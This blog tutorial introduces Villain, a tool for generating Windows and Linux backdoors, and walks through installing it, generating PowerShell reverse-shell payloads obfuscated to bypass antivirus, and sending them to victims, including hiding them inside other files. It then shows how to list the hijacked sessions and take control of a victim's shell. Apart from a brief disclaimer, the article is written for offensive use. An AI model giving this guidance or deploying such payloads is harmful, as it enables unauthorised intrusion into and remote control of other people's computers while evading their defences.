Hello Everyone ! In today’s article, I will introduce a shell hijacking tool on Windows and Linux called Villain. This is a pretty cool and interesting tool suitable for those who are passionate about information security. So straight to the point!
Note: The article is for research purposes only, any illegal acts caused by Anonyviet do not take full responsibility for that.
Villain – Windows and Linux Shell Hijacking Tool
Villain is a tool to create Windows and Linux backdoors and has a function I quite like that this tool can connect 2 or more machines together to work, it’s like 2 or more hackers hijacking 1 some system.
Tools made by the author t3l3machus is a penetration tester and also a cybersecurity researcher. Not only that, tool Villain is inspired by tool Hoaxshell . Villain is written entirely in Python3 language and is quite simple to use for users. Villain has a built-in auto-obfuscate payload function to support users Bypass AntiVirus (for Windows payloads). Therefore, the payload is not detected (at the moment). The payloads generated by Villain are written in Powershell language.
How to install and use Villain
To install the tool, open a terminal and enter the following commands:
git clone https://github.com/t3l3machus/Villain
cd Villain
pip install -r requirements.txt
or pip3 install -r requirements.txt
After performing the above step, now start the tool via the following command:
python Villain.py
or python3 Villain.py
(depending on the version of Python you are using)
Now, you enter the command help
To see the tutorial, to create backdoors, you first need to pay attention to the command generate
means create, also os=
I will take over the Windows shell so I will choose the operating system as windows
And if you want to choose Linux, enter os=linux
next is lhost=
you will enter the IP address or the interface you are using, here I will enter the interface as lhost=ens33
next is obfuscate
this keyword will obfuscate the virus code to bypass AntiVirus
After completing the above steps, your job is now to press enter so that the tool automatically generates a piece of code, when this code is executed on the victim’s machine, it will automatically run in the background and send a notification to the hacker. is successfully hijacking the shell.
You just need to copy that code and open Powershell to try it out, in addition you can create a file .ps1 and then paste that code and then send it to the victim or attach it to a file of your choice, so remember not to cause illegal behavior. Now I will open Powershell and paste it in and try it out ^^.
As the picture below shows, Villain has sent a notification that backdoors have been executed on the victim’s machine
To control the victim’s computer, do the following, first enter the command sessions
This is the command that will show the machines that have been hijacked. You see, the Sessions ID is the victim’s machine ID, followed by the IP address, operating system, and user name. and now to start shell control we enter sessions <session id máy nạn nân>
such as: shell jhjadbae-823cgfsa-8263hfvd-shfvd678
Video demo about tool Villain: https://youtu.be/NqZEmBsLCvQ
This is the end of this post, have a nice day!